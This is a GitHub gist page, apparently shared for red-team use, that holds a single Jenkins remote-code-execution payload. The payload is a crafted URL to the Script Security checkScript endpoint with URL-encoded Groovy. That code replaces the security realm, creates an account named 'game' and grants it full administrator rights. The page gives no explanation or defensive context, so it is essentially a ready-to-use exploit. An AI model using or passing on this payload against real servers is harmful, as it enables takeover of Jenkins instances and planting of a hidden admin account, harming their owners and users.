Skip to content

Instantly share code, notes, and snippets.

@RedTeams
Forked from akhil-reni/payload
Created July 29, 2019 09:42
Show Gist options
  • Select an option

  • Save RedTeams/8104a1a2674440b3e89b1f2e16cef4fd to your computer and use it in GitHub Desktop.

Select an option

Save RedTeams/8104a1a2674440b3e89b1f2e16cef4fd to your computer and use it in GitHub Desktop.
Jenkins Metaprogramming RCE Create new user
http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment